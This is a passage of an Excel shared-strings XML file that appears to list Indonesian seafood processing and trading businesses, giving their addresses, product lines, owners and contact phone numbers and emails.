    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Beku, Rajungan Beku, Keong Beku, Udang Beku, Kerang Beku, Ikan Asin Kering, Kepiting Kulit Lunak Beku, Teripang Kering, Ikan Kering, Cephalopoda Kering, Kepiting Beku, Fillet Ikan Beku, Paha Kodok Beku, Produk Perikanan Bernilai Tambah Beku, Teripang Beku, Tulang Sotong Kering</t>
  </si>
  <si>
    <t>Agus Salim Widjaja</t>
  </si>
  <si>
    <t>anurimanda@gmail.com</t>
  </si>
  <si>
    <t>Arif 085740651113</t>
  </si>
  <si>
    <t>PT. MACKESSEN FOODTECH INDONESIA</t>
  </si>
  <si>
    <t>Taman Tekno BSD Sektor XI Blok H2 No.29, Kel. Setu, Kec. Setu, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Yeap Teck Cheong</t>
  </si>
  <si>
    <t>info.mackessenfoodtech@gmail.com</t>
  </si>
  <si>
    <t>021-29522128</t>
  </si>
  <si>
    <t>Leonita Maulidyanti 083819907109</t>
  </si>
  <si>
    <t>Santi Marianti</t>
  </si>
  <si>
    <t>PT. MILYAR JAYA SUMBER DAGANG</t>
  </si>
  <si>
    <t>Pergudangan Mutiara Tambak Langon D-27, Kel. Tambak Langon, Kec. Asemrowo, Kota Surabaya</t>
  </si>
  <si>
    <t>ABDUL RAUF ST</t>
  </si>
  <si>
    <t>Tambak Langon</t>
  </si>
  <si>
    <t>milyarjayasumberdagang@gmail.com</t>
  </si>
  <si>
    <t>085332459999, 085792411884</t>
  </si>
  <si>
    <t>ABDUL RAUF 085792411884</t>
  </si>
  <si>
    <t>CV. MINA SUKSES SENTOSA</t>
  </si>
  <si>
    <t>Jl. Dermaga Ujung 2 No.2 RT 001 RW 022, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Hastin Hapsari</t>
  </si>
  <si>
    <t>cvminasuksessentosa@gmail.com</t>
  </si>
  <si>
    <t>021-22665467</t>
  </si>
  <si>
    <t>Hastin Hapsari 087772815151</t>
  </si>
  <si>
    <t>UD. BERDIKARI</t>
  </si>
  <si>
    <t>Jl. Amir Hamzah LK II, Kel. Tanjung Balai Kota IV, Kec. Tanjung Balai Utara, Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Udang Beku, Kerang Beku, Cephalopoda Beku, Kepiting Beku</t>
  </si>
  <si>
    <t>SADIKIN</t>
  </si>
  <si>
    <t>Tanjung Balai Utara</t>
  </si>
  <si>
    <t>Tanjung Balai Kota IV</t>
  </si>
  <si>
    <t>berdikari.ud@yahoo.com</t>
  </si>
  <si>
    <t>Sadikin 085261293883</t>
  </si>
  <si>
    <t>UD. BIMA BAHARI MANDIRI</t>
  </si>
  <si>
    <t>Dusun IX, Desa Air Hitam, Kec. Gebang, Kabupaten Langkat</t>
  </si>
  <si>
    <t>Udang Beku, Kerang Beku, Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Kepiting Kulit Lunak Beku, Kerang Hidup, Siput Hidup, Siput Beku</t>
  </si>
  <si>
    <t>JAW LENG ALIAS ALEXANDER CHANDRA</t>
  </si>
  <si>
    <t>Air Hitam</t>
  </si>
  <si>
    <t>alexanderchandra1962@gmail.com</t>
  </si>
  <si>
    <t>0812 6410 0111</t>
  </si>
  <si>
    <t>0812 6386 400</t>
  </si>
  <si>
    <t>PT. ANUGRAH LAUT INDONESIA</t>
  </si>
  <si>
    <t>Jl. Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel. Bancar, Kec. Bancar, Kabupaten Tuban</t>
  </si>
  <si>
    <t>Cephalopoda Kering, Udang Kering, Ikan Kering, Kepiting Beku, Lobster Beku, Pari Beku, Belut Beku, Abalone Beku, Keong Beku, Ikan Hasil Budidaya Beku, Perut Ikan Kering</t>
  </si>
  <si>
    <t>AKTARIA HIDAPRATIWI</t>
  </si>
  <si>
    <t>Bancar</t>
  </si>
  <si>
    <t>yektih@yahoo.com</t>
  </si>
  <si>
    <t>AKTARIA HIDAPRATIWI 081223777223</t>
  </si>
  <si>
    <t>MUHAMMAD ABDUL KHARIS</t>
  </si>
  <si>
    <t>PT. BERKAH BAHARI MINA MAKMUR</t>
  </si>
  <si>
    <t>Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 3), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi</t>
  </si>
  <si>
    <t>Dewi Arisanti Triastuti</t>
  </si>
  <si>
    <t>ptbbmm@gmail.com</t>
  </si>
  <si>
    <t>021-84998742</t>
  </si>
  <si>
    <t>Daryanto 087887002487</t>
  </si>
  <si>
    <t>PT. SUMBER JAYA MAKMUR KELAUTAN</t>
  </si>
  <si>
    <t>Kampung Bagan RT 002 RW 009, Kel. Tanjung Piayu, Kec. Sungai Beduk, Kota Batam</t>
  </si>
  <si>
    <t>Kepiting Hidup</t>
  </si>
  <si>
    <t>Tjang Bong Al Suryadi</t>
  </si>
  <si>
    <t>Sungai Beduk</t>
  </si>
  <si>
    <t>Tanjung Piayu</t>
  </si>
  <si>
    <t>suugiianto@yahoo.com</t>
  </si>
  <si>
    <t>Sugianto 081261227727</t>
  </si>
  <si>
    <t>Sugianto</t>
  </si>
  <si>
    <t>CV. ALAM CIPTA SAMUDRA</t>
  </si>
  <si>
    <t>Jl. Perancis Pergudangan Kosambi Permai Blok II 30, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Udang Kipas Beku</t>
  </si>
  <si>
    <t>Usman Angkasa</t>
  </si>
  <si>
    <t>alamcoptadadap@yahoo.com</t>
  </si>
  <si>
    <t>021-54317338</t>
  </si>
  <si>
    <t>Dwi purnama</t>
  </si>
  <si>
    <t>Felix Noveryan Thanardo</t>
  </si>
  <si>
    <t>CV. ADIWANDY HANANIA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami Kawasan Pergudangan Pattene 88 Cluster Green Park Blok A3 No.3, Kel. Temmapaduae, Kec. Marusu, Kabupaten Maros</t>
  </si>
  <si>
    <t>Rahdy setiawan</t>
  </si>
  <si>
    <t>adiwandyhananiamandiri@gmail.com</t>
  </si>
  <si>
    <t>CV. AYBI</t>
  </si>
  <si>
    <t>Jl. T. Samidan Lr. Usman Muhammad No.4A, Kel. Lamglumpang, Kec. Ulee Kareng, Kota Banda Aceh</t>
  </si>
  <si>
    <t>Kepiting Hidup, Lobster Hidup, Udang Segar</t>
  </si>
  <si>
    <t>TRISNAWATI</t>
  </si>
  <si>
    <t>Ulee Kareng</t>
  </si>
  <si>
    <t>Lamglumpang</t>
  </si>
  <si>
    <t>0852 0750 1625</t>
  </si>
  <si>
    <t>TRISNAWATI 0852 07501625</t>
  </si>
  <si>
    <t>PT. INDOFLORA CIPTA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Pandanlandung No.34 A, Kel. Pandanlandung, Kec. Wagir, Kabupaten Malang</t>
  </si>
  <si>
    <t>Tepung Agar-agar, Refined Carrageenan, Semi Refined Carrageenan, Tepung Jelly Rumput Laut, Tepung Puding Rumput Laut</t>
  </si>
  <si>
    <t>IR. IYEN BOB</t>
  </si>
  <si>
    <t>Wagir</t>
  </si>
  <si>
    <t>Pandanlandung</t>
  </si>
  <si>
    <t>ethozlumba@gmail.com</t>
  </si>
  <si>
    <t>0341-580234, 0341-555777</t>
  </si>
  <si>
    <t>FIRMAN 08883318872</t>
  </si>
  <si>
    <t>FIRMAN ARIFIANSYAH</t>
  </si>
  <si>
    <t>PD. JAYA SAKTI</t>
  </si>
  <si>
    <t>Jl. Pasir Putih RT 10, Kel. Sungai Kapitan, Kec. Kumai, Kabupaten Kotawaringin Barat</t>
  </si>
  <si>
    <t>jepsepto91@gmail.com</t>
  </si>
  <si>
    <t>JEFFRY SEPTO PURNAMA 08116155296</t>
  </si>
  <si>
    <t>JEFFRY SEPTO PURNAMA</t>
  </si>
  <si>
    <t>PT. OCEAN MEGA PERSADA</t>
  </si>
  <si>
    <t>Ruko Klampis Square C-28, Kel. Klampis Ngasem, Kec. Sukolilo, Kota Surabaya</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Pelagis Beku, Ikan Hasil Budidaya Beku, Cephalopoda Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>JOSAPHAT RAHDI PRAKOSA</t>
  </si>
  <si>
    <t>Desa Rangkah Kidul</t>
  </si>
  <si>
    <t>rury@oceanmega.com</t>
  </si>
  <si>
    <t>031-99712491</t>
  </si>
  <si>
    <t>DHEO 085813430123</t>
  </si>
  <si>
    <t>IRENE TANTRI ANDRIANI</t>
  </si>
  <si>
    <t>CV. BINTAN JAYA</t>
  </si>
  <si>
    <t>Kp. Kemboja No.72 RT 01 RW 11, Kec. Tanjungpinang Barat, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t xml:space="preserve">Kerang Segar, Rajungan Segar, Udang Segar, Cephalopoda Segar, Siput Hidup, Kerang Hidup, Kepiting Hidup, Daging Kerang Beku, Siput Segar </t>
  </si>
  <si>
    <t>CV.BINTAN JAYA</t>
  </si>
  <si>
    <t>Tanjungpinang Barat</t>
  </si>
  <si>
    <t>cv.bintanjaya02@gmail.com</t>
  </si>
  <si>
    <t>SUHARIYADI 081270336066</t>
  </si>
  <si>
    <t>CV. ASRYL PERKASA</t>
  </si>
  <si>
    <t>Perumahan Citra Sanggalea Indah D4 No.4, Kel. Taroada, Kec. Turikale, Kabupaten Maros</t>
  </si>
  <si>
    <t>ANDI SYAMSUL ALAM</t>
  </si>
  <si>
    <t>Taroada</t>
  </si>
  <si>
    <t>irna.fitriana@yahoo.com</t>
  </si>
  <si>
    <t>ANI 082296549667</t>
  </si>
  <si>
    <t>CV. SURABAYA OCEAN TRADING</t>
  </si>
  <si>
    <t>Jl. Benteng Miring No.23, Kel. Ujung, Kec. Semampir, Kota Surabaya</t>
  </si>
  <si>
    <t>Gelembung Ikan Kering, Teripang Kering, Sirip Hiu Kering</t>
  </si>
  <si>
    <t>SYAUGI</t>
  </si>
  <si>
    <t>Ujung</t>
  </si>
  <si>
    <t>surabayaoceantrading@gmail.com</t>
  </si>
  <si>
    <t>ABDUL MAJID 081803077816</t>
  </si>
  <si>
    <t>PT. MATSYARAJA ARNAWA STAMBHAPURA</t>
  </si>
  <si>
    <t>Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar, Tuna Loin Beku, Tuna Loin Segar, Cephalopoda Beku, Cephalopoda Segar, Udang Beku, Udang Segar</t>
  </si>
  <si>
    <t>I GUSTI ARYA EMAN HIMAWAN</t>
  </si>
  <si>
    <t>Alak</t>
  </si>
  <si>
    <t>arnawa.kupang@gmail.com</t>
  </si>
  <si>
    <t>BREVA RIZQI DIYAH NUGRAHA / 081340296778</t>
  </si>
  <si>
    <t>BREVA RIZQI DIYAH NUGRAHA</t>
  </si>
  <si>
    <t>PT. AGRITA BEST SEAFOOD</t>
  </si>
  <si>
    <t>Gedung Coolroom No.4 Kawasan Pelabuhan Muara Angke, Jl. Dermaga Muara Angke No.4, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Pelagis Beku, Bandeng Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>NJOO MEI LIOE ALIAS ANITA</t>
  </si>
  <si>
    <t>agrita.best@gmail.com</t>
  </si>
  <si>
    <t>NJOO MEI LIOE ANITA 081219118939, Nikita 081289305712</t>
  </si>
  <si>
    <t>SINGARI KOHAR</t>
  </si>
  <si>
    <t>MULIA ARIS FISHERY</t>
  </si>
  <si>
    <t>Pelantar Asam Gg II RT 02 RW 07, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Cephalopoda Segar</t>
  </si>
  <si>
    <t>MUKHLIS S.UD</t>
  </si>
  <si>
    <t>funaufar77@gmail.com</t>
  </si>
  <si>
    <t>0852-6440-9992</t>
  </si>
  <si>
    <t>CV. LOBSTER ORIGIN PARADISE</t>
  </si>
  <si>
    <t>Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah</t>
  </si>
  <si>
    <t>Lobster Beku, Daging Lobster Beku, Cephalopoda Segar, Kerang Hidup, Kerang Segar, Cephalopoda Beku, Tuna Beku, Tuna Segar, Ikan Demersal Segar, Ikan Demersal Beku, Udang Beku, Ikan Pelagis Beku, Ikan Pelagis Segar, Lobster Hidup</t>
  </si>
  <si>
    <t>Indira Agnes Sit</t>
  </si>
  <si>
    <t>Praya Timur</t>
  </si>
  <si>
    <t>Ganti</t>
  </si>
  <si>
    <t>seasaltlobsterlombok@gmail.com</t>
  </si>
  <si>
    <t>Indira Agnes 082231239300</t>
  </si>
  <si>
    <t>Willy Gunawan</t>
  </si>
  <si>
    <t>CV. MIRANTI</t>
  </si>
  <si>
    <t>Griya Batas Kota Blok D 27 No.10, Kel. Marumpa, Kec. Marusu, Kabupaten Maros</t>
  </si>
  <si>
    <t>Alimuddin</t>
  </si>
  <si>
    <t>cvmiranti2017@gmail.com</t>
  </si>
  <si>
    <t>Ahmad &amp; 082155827111</t>
  </si>
  <si>
    <t>Pergudangan 88 Pattene Blok AF No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros</t>
  </si>
  <si>
    <t>Lau Hartanto Ludy</t>
  </si>
  <si>
    <t>josephjo0108@gmail.com</t>
  </si>
  <si>
    <t>Joseph 085256250410</t>
  </si>
  <si>
    <t>CV. SUNLEE AGUNG</t>
  </si>
  <si>
    <t>Legundi Sumo Estate A - 55, Kel. Krikilan, Kec. Driyorejo, Kabupaten Gresik</t>
  </si>
  <si>
    <t>SUDI</t>
  </si>
  <si>
    <t>Krikilan</t>
  </si>
  <si>
    <t>sunleeagung1818@gmail.com</t>
  </si>
  <si>
    <t>Sudi, 081332821988</t>
  </si>
  <si>
    <t>QAN</t>
  </si>
  <si>
    <t>Jl. Anggrek Bukit RT 22 No.07, Kel. Air Putih, Kec. Samarinda Ulu, Kota Samarinda</t>
  </si>
  <si>
    <t>Lainnya, Lumatan Daging</t>
  </si>
  <si>
    <t>Pempek Ikan, Otak-Otak Ikan, Tekwan Ikan</t>
  </si>
  <si>
    <t>JEPPY NANTA</t>
  </si>
  <si>
    <t>Air Putih</t>
  </si>
  <si>
    <t>jeppyaja@gmail.com</t>
  </si>
  <si>
    <t>JEPPY NANTA 081392110442</t>
  </si>
  <si>
    <t>UD. BARAKAH</t>
  </si>
  <si>
    <t>Kampung Nelayan Olio RT 16 RW 06, Kel. Merdeka, Kec. Kupang Timur, Kabupaten Kupang</t>
  </si>
  <si>
    <t>Amozuta Harefa</t>
  </si>
  <si>
    <t>Kupang Timur</t>
  </si>
  <si>
    <t>Merdeka</t>
  </si>
  <si>
    <t>harevaamos@gmail.com</t>
  </si>
  <si>
    <t>KOPERASI HASIL BERKAT LAUTAN INDONESIA</t>
  </si>
  <si>
    <t>Jl. Tanjung Pasir RT 21, Kel. Mamburungan, Kec. Tarakan Timur, Kota Tarakan</t>
  </si>
  <si>
    <t>JUMRIAH</t>
  </si>
  <si>
    <t>Mamburungan</t>
  </si>
  <si>
    <t>siskaameliatiasari.03@gmail.com</t>
  </si>
  <si>
    <t>JUMRIAH, 085233046210</t>
  </si>
  <si>
    <t>PT. DUNIA MARINE PRODUCTS</t>
  </si>
  <si>
    <t>Jl. Kawasan Industri Makassar 3/K-4B, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Udang Beku, Cephalopoda Beku, Telur Ikan Terbang Kering, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>CHAE KYU SEUNG</t>
  </si>
  <si>
    <t>sinaralam130@yahoo.co.id</t>
  </si>
  <si>
    <t>0411-512619</t>
  </si>
  <si>
    <t>SINAR ALAM &amp; 085342845272</t>
  </si>
  <si>
    <t>ABDUL MUIS, AMD</t>
  </si>
  <si>
    <t>PT. ETMIECO MAKMUR ABADI</t>
  </si>
  <si>
    <t>Jl. Samuel Languyu No.8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung</t>
  </si>
  <si>
    <t>Beku, Segar, Reduksi</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Loin Beku, Tuna Loin Segar, Tuna Beku, Tuna Segar, Tepung Ikan, Ikan Demersal Segar, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>ETTY ROMPIS</t>
  </si>
  <si>
    <t>merry.mangonto@etmieco.com</t>
  </si>
  <si>
    <t>0438-31388</t>
  </si>
  <si>
    <t>Lia 085298103593</t>
  </si>
  <si>
    <t>ERWIN IRAWAN</t>
  </si>
  <si>
    <t>PT. MAKMUR JAYA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Tuna Beku, Tuna Segar, Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Demersal Segar, Cephalopoda Beku, Cephalopoda Segar, Udang Kipas Beku</t>
  </si>
  <si>
    <t>FARIDA</t>
  </si>
  <si>
    <t>permatajkt126@gmail.com</t>
  </si>
  <si>
    <t>021 - 6623181 / 6623374</t>
  </si>
  <si>
    <t>JUNAEDI SLAMET / 0812 1210 8436</t>
  </si>
  <si>
    <t>JUNAEDI SLAMET</t>
  </si>
  <si>
    <t>Desa Daeo Majiko, Kec. Morotai Selatan, Kabupaten Pulau Morotai</t>
  </si>
  <si>
    <t>Tuna Loin Beku, Tuna Segar, Ikan Demesal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t xml:space="preserve">ROBERT TJOANDA </t>
  </si>
  <si>
    <t xml:space="preserve">Morotai Selatan </t>
  </si>
  <si>
    <t xml:space="preserve">Daeo Majiko </t>
  </si>
  <si>
    <t>isnawati.myura@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">(0911) 312404 </t>
  </si>
  <si>
    <t xml:space="preserve">I MADE MALIHARTADANA/ 082199610882 </t>
  </si>
  <si>
    <t xml:space="preserve">I MADE MALIHARTADANA </t>
  </si>
  <si>
    <t>PT. SEGAR LARIS NIAGA</t>
  </si>
  <si>
    <t>Jl. Raya Cakung Cilincing No.118 B, Kel. Semper Barat, Kec. Cilincing, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>IMANNUEL RICARDO REHATTA</t>
  </si>
  <si>
    <t>Semper Barat</t>
  </si>
  <si>
    <t>general.segalaris@gmail.com</t>
  </si>
  <si>
    <t>+62-21 9541795</t>
  </si>
  <si>
    <t>Agus Salim, S.Pi      082334205948</t>
  </si>
  <si>
    <t>CV. ANUGRAH LESTARI</t>
  </si>
  <si>
    <t>Jl. Klabat No.40 Perumahan Bukit Baruga, Kel. Antang, Kec. Manggala, Kota Makassar</t>
  </si>
  <si>
    <t>Gelembung Ikan Kering, Kulit Ikan Kering</t>
  </si>
  <si>
    <t>ADNAN HULUDIN</t>
  </si>
  <si>
    <t>Manggala</t>
  </si>
  <si>
    <t>Antang</t>
  </si>
  <si>
    <t>huludinadnan@yahoo.co.id</t>
  </si>
  <si>
    <t>YULAN ASMARA (082293848661)</t>
  </si>
  <si>
    <t>PT. CAKRAWALA SAMUDERA MANDIRI</t>
  </si>
  <si>
    <t>Kompleks PPN Ambon, Jl. Sultan Hasanudin RT 03 RW 011, Kel. Batu Merah, Kec. Sirimau, Kota Ambon</t>
  </si>
  <si>
    <t>Tuna Loin Segar, Tuna Loin Beku</t>
  </si>
  <si>
    <t>ANDIK BHIRAWA POETRANTO</t>
  </si>
  <si>
    <t>Batu Merah</t>
  </si>
  <si>
    <t>csm.fishery@gmail.com</t>
  </si>
  <si>
    <t>021-83793103</t>
  </si>
  <si>
    <t>Andik Bhirawa Poetranto 081384212170</t>
  </si>
  <si>
    <t>M. AZMI ROBBANI</t>
  </si>
  <si>
    <t>CV. YUDA YUDI GRUP</t>
  </si>
  <si>
    <t>Jl. Fakih Usman Lorong Sungai Goren Satu No.12 RT 023 RW 004, Kel. 1 Ulu, Kec. Seberang Ulu I, Kota Palembang</t>
  </si>
  <si>
    <t>Lumatan Daging Gabus Beku</t>
  </si>
  <si>
    <t>ADI YANSYAH</t>
  </si>
  <si>
    <t>1 Ulu</t>
  </si>
  <si>
    <t>cv.yudhayudhi@gmail.com</t>
  </si>
  <si>
    <t>082380005619/ 082377777713</t>
  </si>
  <si>
    <t>ADI YANSYAH 082380005619</t>
  </si>
  <si>
    <t>CV. JASA LAUT</t>
  </si>
  <si>
    <t>Jl. Kapten Muslim Komplek Tata Plaza No.12B, Kel. Dwi Kora, Kec. Medan Helvetia, Kota Medan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Kerang Hidup, Siput Hidup, Kepiting Hidup, Lobster Hidup, Sidat Hidup, Belut Hidup</t>
  </si>
  <si>
    <t>Andrias</t>
  </si>
  <si>
    <t>Medan Helvetia</t>
  </si>
  <si>
    <t>Dwi Kora</t>
  </si>
  <si>
    <t>cvjasalaut2018@gmail.com</t>
  </si>
  <si>
    <t>Ahok 085275520628</t>
  </si>
  <si>
    <t>NGUDI REJEKI</t>
  </si>
  <si>
    <t>Neco Lor RT 06, Kel. Sabdodadi, Kec. Bantul, Kabupaten Bantul</t>
  </si>
  <si>
    <t>Bandeng Duri Lunak</t>
  </si>
  <si>
    <t>SUGIYEM</t>
  </si>
  <si>
    <t>Bantul</t>
  </si>
  <si>
    <t>Sabdodadi</t>
  </si>
  <si>
    <t>ngudirejeki@yandex.com</t>
  </si>
  <si>
    <t>Iwan 087888827915</t>
  </si>
  <si>
    <t>PT. SARI SEGAR LAUT INDONESIA</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya Timur I Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Katsu Beku, Tuna Beku, Tuna Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>Mr. Maruko</t>
  </si>
  <si>
    <t>sslilab103@gmail.com</t>
  </si>
  <si>
    <t>0361-720233</t>
  </si>
  <si>
    <t>Faiz Itsnaini 08175711668</t>
  </si>
  <si>
    <t>Eric Yohannes, SE</t>
  </si>
  <si>
    <t>CV. LIMA MUTIARA INDOMAL</t>
  </si>
  <si>
    <t>Jl. Perancis No.19, Pergudangan Mutiara Kosambi 1 Blok C7 No.3, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Betutu Hidup, Lobster Hidup, Kepiting Hidup, Kerapu Hidup, Udang Ronggeng Hidup, Kerang Hidup, Sidat Hidup</t>
  </si>
  <si>
    <t>INDAH KUMALA SARI</t>
  </si>
  <si>
    <t>cvlimamutiara1@gmail.com</t>
  </si>
  <si>
    <t>0551-3803772</t>
  </si>
  <si>
    <t>MAULANA MALIK IBRAHIM</t>
  </si>
  <si>
    <t>UD. BENSON S PERMAI</t>
  </si>
  <si>
    <t>Komplek Pergudangan Margomulyo Permai Blok N-10A, Kel. Asem Rowo, Kec. Asem Rowo, Kota Surabaya</t>
  </si>
  <si>
    <t>Teripang Kering, Sirip Hiu Kering, Gelembung Ikan Kering</t>
  </si>
  <si>
    <t>THE, JUSUF TENDEAN</t>
  </si>
  <si>
    <t>Asem Rowo</t>
  </si>
  <si>
    <t>bensonspermai@gmail.com</t>
  </si>
  <si>
    <t>THE, JUSUF TENDEAN 08123505850</t>
  </si>
  <si>
    <t>CV. DELAPAN DELAPAN</t>
  </si>
  <si>
    <t>Jl. TGH Faesal No.88X Lingkungan Gerung Sayo Indah, Kel. Mandalika, Kec. Sandubaya, Kota Mataram</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku, Fillet Patin Beku</t>
  </si>
  <si>
    <t>A. A. Linggawati</t>
  </si>
  <si>
    <t>Sandubaya</t>
  </si>
  <si>
    <t>Mandalika</t>
  </si>
  <si>
    <t>drh.mergayanti@cv88.co.id</t>
  </si>
  <si>
    <t>0370 - 671478</t>
  </si>
  <si>
    <t>drh. Mergayanti Yudanta Eka Putri 081907582071</t>
  </si>
  <si>
    <t>Jl. Raya Rembang-Juana Km 5, Kel. Purworejo, Kec. Kaliori, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Ikan Kering, Teri Nasi Kering, Himego Kering</t>
  </si>
  <si>
    <t>adi.senoadji@ics-seafood.com</t>
  </si>
  <si>
    <t>(0295)6980396</t>
  </si>
  <si>
    <t>Adi Senoadji 08122886280</t>
  </si>
  <si>
    <t>Hery Wahyudi</t>
  </si>
  <si>
    <t>CV. JASUMA</t>
  </si>
  <si>
    <t>Jl. Raya Prancis Komplek Pergudangan Kosambi Permai Blok E-9, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Ikan Demersal Segar, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku, Cephalopoda Beku, Daging Tuna Beku</t>
  </si>
  <si>
    <t>Ricky lau</t>
  </si>
  <si>
    <t>CJASUMA@GMAIL.COM</t>
  </si>
  <si>
    <t xml:space="preserve"> 021-5592911, 021-5592910, 0811119199</t>
  </si>
  <si>
    <t>Ricky Lau</t>
  </si>
  <si>
    <t>SUKIRMAN</t>
  </si>
  <si>
    <t>Jl. Plantar KUD RT 004 RW 014, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Udang Segar, Kepiting Segar, Cephalopoda Segar</t>
  </si>
  <si>
    <t>Sukirman</t>
  </si>
  <si>
    <t>atieatie165@gmail.com</t>
  </si>
  <si>
    <t>Sukirman 085274387829</t>
  </si>
  <si>
    <t>PT. JALA SEMBILAN</t>
  </si>
  <si>
    <t>Kawasan Industri Wijayakusuma Jl. Tugu Wijaya IV No. 2, Randugarut, Tugu, Semarang, Kel. Randugarut, Kec. Tugu, Kota Semarang</t>
  </si>
  <si>
    <t>Fillet Ikan Berlapis Tepung Beku</t>
  </si>
  <si>
    <t>David Hendra Salim</t>
  </si>
  <si>
    <t>ummahshoffiati@gmail.com</t>
  </si>
  <si>
    <t>024 86599100</t>
  </si>
  <si>
    <t>Hanny/082154033846</t>
  </si>
  <si>
    <t>PT. BOGATAMA MARINUSA</t>
  </si>
  <si>
    <t>Jl. Kima Raya 2 Kav N-4 B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>CHIN TIGOR CHENDARMA</t>
  </si>
  <si>
    <t>udhiinraihan@gmail.com</t>
  </si>
  <si>
    <t>0411-513378</t>
  </si>
  <si>
    <t>HASANUDDIN 085298431913</t>
  </si>
  <si>
    <t>JUMERI</t>
  </si>
  <si>
    <t>CV. SUMBER LAUT REJEKI</t>
  </si>
  <si>
    <t>Jl. Pelelangan Baru Dermaga 1 No.28-29 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>WILLIAN</t>
  </si>
  <si>
    <t>sumberlautrejeki@gmail.com</t>
  </si>
  <si>
    <t>021-66607813</t>
  </si>
  <si>
    <t>ERICK 081282478278</t>
  </si>
  <si>
    <t>Erick</t>
  </si>
  <si>
    <t>PT. SUMBER WALET ALAM</t>
  </si>
  <si>
    <t>Komplek Rezeki Graha Mas Blok G No.15, Kel. Sungai Panas, Kec. Batam Kota, Kota Batam</t>
  </si>
  <si>
    <t>Teripang Kering, Teri Kering</t>
  </si>
  <si>
    <t>Roby Candra</t>
  </si>
  <si>
    <t>Sungai Panas</t>
  </si>
  <si>
    <t>ptsumberwaletalam@yahoo.com</t>
  </si>
  <si>
    <t>Roby Candra / 081270981111, Hengky Chandra 08127711817</t>
  </si>
  <si>
    <t>CV. A TIGA</t>
  </si>
  <si>
    <t>Jl.Jamaker, RT.26, Kelurahan Nunukan Barat, Kec,Nunukan, Kab.Nunukan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Utuh Beku</t>
  </si>
  <si>
    <t>Hj. Sudarmi</t>
  </si>
  <si>
    <t>Nunukan</t>
  </si>
  <si>
    <t>Nunukan Utara</t>
  </si>
  <si>
    <t>cv.a3nunukan@yahoo.com</t>
  </si>
  <si>
    <t>A.Zulkifli Guntur</t>
  </si>
  <si>
    <t>CV. SAMARA FOOD</t>
  </si>
  <si>
    <t>Jl. M. Syafei No.12 RT 02 RW 02, Kel. Talang, Kec. Payakumbuh Barat, Kota Payakumbuh</t>
  </si>
  <si>
    <t>Ermiwati</t>
  </si>
  <si>
    <t>Payakumbuh Barat</t>
  </si>
  <si>
    <t xml:space="preserve">Talang </t>
  </si>
  <si>
    <t>rahmispt@gmail.com</t>
  </si>
  <si>
    <t>Rahmi &amp; 081374901457</t>
  </si>
  <si>
    <t>Rahmi, S.Pt., MP</t>
  </si>
  <si>
    <t>RIZKI BERSAMA JAYA</t>
  </si>
  <si>
    <t>Kp. Cisemplak RT 003 RW 006, Kel. Wangunreja, Kec. Nyalindung, Kabupaten Sukabumi</t>
  </si>
  <si>
